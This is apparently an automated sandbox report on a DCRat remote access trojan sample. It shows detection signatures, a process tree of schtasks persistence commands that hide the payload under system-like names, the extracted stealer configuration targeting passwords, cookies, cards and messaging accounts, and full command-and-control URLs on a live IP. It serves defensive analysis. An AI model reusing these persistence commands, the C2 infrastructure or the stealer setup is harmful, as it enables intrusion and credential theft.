Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XPC5PMKegV.exe

Overview

General Information

Sample name:XPC5PMKegV.exe
renamed because original name is a hash value
Original sample name:20cf7f39edef3db30f388829c5a3f05c.exe
Analysis ID:1500508
MD5:20cf7f39edef3db30f388829c5a3f05c
SHA1:009eb186382733844b2d8c5202d0da9ac1f8dfb0
SHA256:2554c3bd1b50fccf6833eb50179c877a95fce8135031204e8e678c4d8c5db89f
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XPC5PMKegV.exe (PID: 4924 cmdline: "C:\Users\user\Desktop\XPC5PMKegV.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
    • schtasks.exe (PID: 1708 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1600 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1668 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5344 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1908 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4188 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2912 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6568 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6040 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5764 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2196 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3560 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3052 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2820 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1460 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5960 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7044 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6956 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3164 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6272 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6248 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3248 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 6928 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • xMLVfJVxhYAkoCJ.exe (PID: 6248 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 6684 cmdline: C:\Recovery\xMLVfJVxhYAkoCJ.exe MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • Registry.exe (PID: 432 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • Registry.exe (PID: 6844 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • StartMenuExperienceHost.exe (PID: 6840 cmdline: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • StartMenuExperienceHost.exe (PID: 5060 cmdline: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • System.exe (PID: 1708 cmdline: "C:\Program Files (x86)\microsoft.net\System.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • System.exe (PID: 1600 cmdline: "C:\Program Files (x86)\microsoft.net\System.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 1912 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 5204 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • Registry.exe (PID: 1212 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • StartMenuExperienceHost.exe (PID: 6320 cmdline: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • System.exe (PID: 5764 cmdline: "C:\Program Files (x86)\microsoft.net\System.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 6316 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"p\":\"~\",\"B\":\"$\",\"3\":\"*\",\"J\":\"#\",\"c\":\",\",\"i\":\"_\",\"m\":\"!\",\"U\":\"^\",\"V\":\" \",\"b\":\"(\",\"2\":\"<\",\"F\":\">\",\"I\":\".\",\"s\":\"-\",\"M\":\"|\",\"C\":\";\",\"R\":\")\",\"a\":\"@\",\"1\":\"&\",\"6\":\"`\",\"G\":\"%\"}", "PCRT": "{\"v\":\"%\",\"0\":\"!\",\"Q\":\",\",\"Y\":\"|\",\"U\":\"^\",\"F\":\"&\",\"d\":\"`\",\"R\":\"*\",\"K\":\"$\",\"V\":\"(\",\"Z\":\"~\",\"x\":\" \",\"3\":\"-\",\"B\":\";\",\"G\":\">\",\"I\":\"<\",\"X\":\"@\",\"W\":\")\",\"t\":\"#\",\"N\":\".\",\"4\":\"_\"}", "TAG": "m", "MUTEX": "DCR_MUTEX-WVn4oNZYFAP9yGpaqtNX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 28 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: New RUN Key Pointing to Suspicious Folder
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XPC5PMKegV.exe, ProcessId: 4924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMLVfJVxhYAkoCJ
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\xMLVfJVxhYAkoCJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XPC5PMKegV.exe, ProcessId: 4924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMLVfJVxhYAkoCJ
            Sigma detected: CurrentVersion NT Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\xMLVfJVxhYAkoCJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XPC5PMKegV.exe, ProcessId: 4924, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

            Suricata Signatures

            Timestamp:2024-08-28T15:33:05.344387+0200
            SID:2034194
            Severity:1
            Source Port:51868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:36.984645+0200
            SID:2034194
            Severity:1
            Source Port:51883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:21.097692+0200
            SID:2034194
            Severity:1
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:37.126376+0200
            SID:2034194
            Severity:1
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:59.790382+0200
            SID:2034194
            Severity:1
            Source Port:51891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:31.565096+0200
            SID:2034194
            Severity:1
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:06.567162+0200
            SID:2034194
            Severity:1
            Source Port:51870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:21.697481+0200
            SID:2034194
            Severity:1
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:35.764312+0200
            SID:2034194
            Severity:1
            Source Port:51881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:37.876203+0200
            SID:2034194
            Severity:1
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:42.156568+0200
            SID:2034194
            Severity:1
            Source Port:51885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:22.963796+0200
            SID:2034194
            Severity:1
            Source Port:51875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:04.720687+0200
            SID:2034194
            Severity:1
            Source Port:51867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:20.478417+0200
            SID:2034194
            Severity:1
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:35.893759+0200
            SID:2034194
            Severity:1
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:24.207738+0200
            SID:2034194
            Severity:1
            Source Port:51877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:42.765236+0200
            SID:2034194
            Severity:1
            Source Port:51886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:23.579696+0200
            SID:2034194
            Severity:1
            Source Port:51876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:48.124816+0200
            SID:2034194
            Severity:1
            Source Port:51859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:29.712573+0200
            SID:2034194
            Severity:1
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:43.410775+0200
            SID:2034194
            Severity:1
            Source Port:51887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:48.730443+0200
            SID:2034194
            Severity:1
            Source Port:51860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:13.321787+0200
            SID:2034194
            Severity:1
            Source Port:51873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:54.044731+0200
            SID:2034194
            Severity:1
            Source Port:51864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:44.007271+0200
            SID:2034194
            Severity:1
            Source Port:51888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:30.956596+0200
            SID:2034194
            Severity:1
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:59.191453+0200
            SID:2034194
            Severity:1
            Source Port:51890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:36.518457+0200
            SID:2034194
            Severity:1
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:58.527866+0200
            SID:2034194
            Severity:1
            Source Port:51889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:24.813155+0200
            SID:2034194
            Severity:1
            Source Port:51878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:19.857080+0200
            SID:2034194
            Severity:1
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:34:00.390952+0200
            SID:2034194
            Severity:1
            Source Port:51892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:47.497104+0200
            SID:2034194
            Severity:1
            Source Port:51858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:11.912213+0200
            SID:2034194
            Severity:1
            Source Port:51871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:13.921189+0200
            SID:2034194
            Severity:1
            Source Port:51874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:12.521816+0200
            SID:2034194
            Severity:1
            Source Port:51872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:37.591556+0200
            SID:2034194
            Severity:1
            Source Port:51884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:36.379420+0200
            SID:2034194
            Severity:1
            Source Port:51882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:05.947903+0200
            SID:2034194
            Severity:1
            Source Port:51869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:54.639914+0200
            SID:2034194
            Severity:1
            Source Port:51865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:52.796486+0200
            SID:2034194
            Severity:1
            Source Port:51862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:53.437128+0200
            SID:2034194
            Severity:1
            Source Port:51863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:30.339189+0200
            SID:2034194
            Severity:1
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:49.326493+0200
            SID:2034194
            Severity:1
            Source Port:51861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: XPC5PMKegV.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16BcAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGTAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0eAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchNAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44Avira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdNAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgAAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0rAvira URL Cloud: Label: malware
